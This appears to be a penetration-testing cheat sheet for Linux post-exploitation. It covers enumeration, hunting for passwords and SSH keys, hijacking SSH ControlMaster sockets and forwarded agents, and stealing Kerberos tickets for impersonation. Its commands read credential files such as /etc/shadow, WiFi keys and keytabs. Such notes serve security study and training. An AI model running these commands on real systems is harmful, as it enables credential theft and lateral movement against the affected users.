# Linux ## Introduction This section contains some useful commands that will help you enumerate the Linux system, obtaining helpful information for a later Privilege Escalation or Lateral movements. ## User and group enumeration * Print real and effective user and group IDs from the current user: `id` * List all users, groups and shells for each user: `cat /etc/passwd` * List user accounts who does not require password: ```bash sudo awk -F: '($2==""){print}' /etc/shadow ``` * List the allowed (and forbidden) commands for the invoking or specified (`-u`) user: `sudo -l` * List all existing groups: `cat /etc/group | sort` * Print executed commands (Looking for credentials): `{cat ~/.bash_history} | {history}` ## Operative System * **Architecture**: ```bash uname -a ``` * **Environment variables**: ```bash env ``` ## Network Enumeration * List network interfaces: `ip -br a` * List all connections: `netstat -putona` * List only listening ports: `netstat pluton | ss -pltn` * List hardcoded domains: `cat /etc/hosts` * List iptables: `iptables -L` * Outgoing connections to a specific IP: `ss -anpt | grep | grep ESTAB` * Real-time traffic monitoring: `tcpdump -i -s0 -n -vv` * Obtian WiFi passwords: `sudo grep psk= /etc/NetworkManager/system-connections/*` ## Files enumeration ### Files owned by a user There might be files owned by a specific user stored in hidden folders. ```bash find / -type f -user -or -group 2>/dev/null | grep -v ^/proc ``` ### Modified files There might be files being modified with a cronjob or during a workday. ```bash find / -type f -newermt ! -newermt ``` ### Accessed files There might be files being accessed with a cronjob or during a workday. ```bash find / -type f -newerat ! -newerat ``` ### Disks List mounted disks at Linux startup. ```bash cat /etc/fstab ``` ## Password Enumeration Look for files that contain passwords or keys. ```bash # Passwords grep -rnw '/' -ie "passw" --color=always 2>/dev/null cat ~/.bash_history | grep -i passw # Find SSH keys find / -type f -name id_rsa 2>/dev/null grep -rnw '/' -ie "private key" --color=always 2>/dev/null ``` ## Cronjobs List scheduled jobs. ```bash cat /etc/crontab crontabe -e ``` ## SSH * Find SSH keys: ```bash find /home/ -iname "id_rsa" find /home/ -iname "*.key" ``` ### **Control Master** When ControlMaster is enabled, the initial SSH connection (the master connection) is established, and subsequent connections (slave connections) can reuse the existing master connection. This can lead to faster connection times and reduced resource usage, especially when connecting to the same remote server multiple times. If an attacker gains access to a system where SSH ControlMaster is in use, they might exploit the existing master connection to execute commands or perform other malicious activities without the need to authenticate repeatedly. 1. Check if the file `~/.ssh/config` exists with the following configuration. Meaning, that ControlMaster is enabled. ```bash Host * ControlPath ~/.ssh/controlmaster/%r@%h:%p ControlMaster auto ControlPersist 10m ``` 2. Look for any active connection under `~/.ssh/controlmaster/`. ```bash offsec@controller:~$ ls -al ~/.ssh/controlmaster/ total 8 drwxrwxr-x 2 offsec offsec 4096 May 13 13:55 . drwx------ 3 offsec offsec 4096 May 13 13:55 .. srw------- 1 offsec offsec 0 May 13 13:55 offsec@linuxvictim:22 ``` 3. Use the existing connection to perform lateral movement. * **User**: If you are the user to whom the connection file belongs, simply SSH to the session. ```bash offsec@linuxvictim:22 ``` * **Root**: ```bash ssh -S /home/offsec/.ssh/controlmaster/offsec\@linuxvictim\:22 offsec@linuxvictim ``` ### **SSH Agent Forwarding** SSH Agent Forwarding allows the SSH-Agent on a local machine to be used for authentication when connecting to remote servers. If an attacker gains access to a machine where Agent Forwarding is active, they might abuse the forwarded agent connection to authenticate to other machines. Check if `~/.ssh/config` contains `ForwardAgent yes` or the SSH configuration `/etc/ssh/sshd_config` on the server must have `AllowAgentForwarding yes`. Then, check if there is any active connection. ```bash ps aux | grep ssh ``` * **User**: If you are the user to whom the connection belongs, simply SSH to the session. Then, simply execute the SSH command to automatically access the other computer. * **Root**: Inspect processes with "ssh" in the name, we will find any open connections from the host. We can use the usernames listed in these connections with the pstree command to get the process ID (PID) values for the SSH processes. ```bash pstree -p | grep ssh sshd(15228)---bash(15229)---su(15241)---bash(15242) sshd(16380)---bash(16381) ``` Then, we extract the `SSH_AUTH_SOCK` environment variable from their connection to obtain the stored SSH socket. ```bash cat /proc/16381/environ ``` After that, we need to add it: ```bash root@controller:~# SSH_AUTH_SOCK=/tmp/ssh-7OgTFiQJhL/agent.16380 ssh-add -l ``` Finally, we can try to access the target we might have in mind that the victim is connecting to or look for clues in order to see where our victim is connecting to. ```bash ss -ntp | grep 22 | grep -i ssh ``` ## Kerberos Kerberos tickets can also be found on Linux machines that belong to Active Directory domains. Enumerating the machine looking for Kerberos information can be crucial to perform lateral movement to other machines on the domain. * **Obtain domain information from the kerberos configuration file.** ```bash cat /etc/krb5.conf ``` * **Find KRB user cache credentials.** ```bash find /tmp/ -type f -iname "*krb5cc_*" 2>/dev/null ``` * **Impersonate user using `krb5cc_` files.** ```bash sudo cp /tmp/krb5cc_* /tmp/krb5cc_minenow sudo chown : /tmp/krb5cc_minenow kdestroy export KRB5CCNAME=/tmp/krb5cc_minenow klist ``` * **Find keytab files.** ```bash find / -type f -iname "*.keytab" 2>/dev/null ls /etc/krb5.* ``` * **Extract keytab information like domain, service principal and NTLM hash.** ```bash python3 KeyTabExtract/keytabextract.py krb5.keytab ``` * **List tickets currently stored in the user’s credential cache file.** ```bash klist ``` * **Convert a Mimikatz ticket to ccache.** ```bash ticketConverter.py adminWebSvc.kirbi adminWebSvc.ccache export KRB5CCNAME=/var/www/html/OSEP/Challenge6/adminWebSvc.ccache ```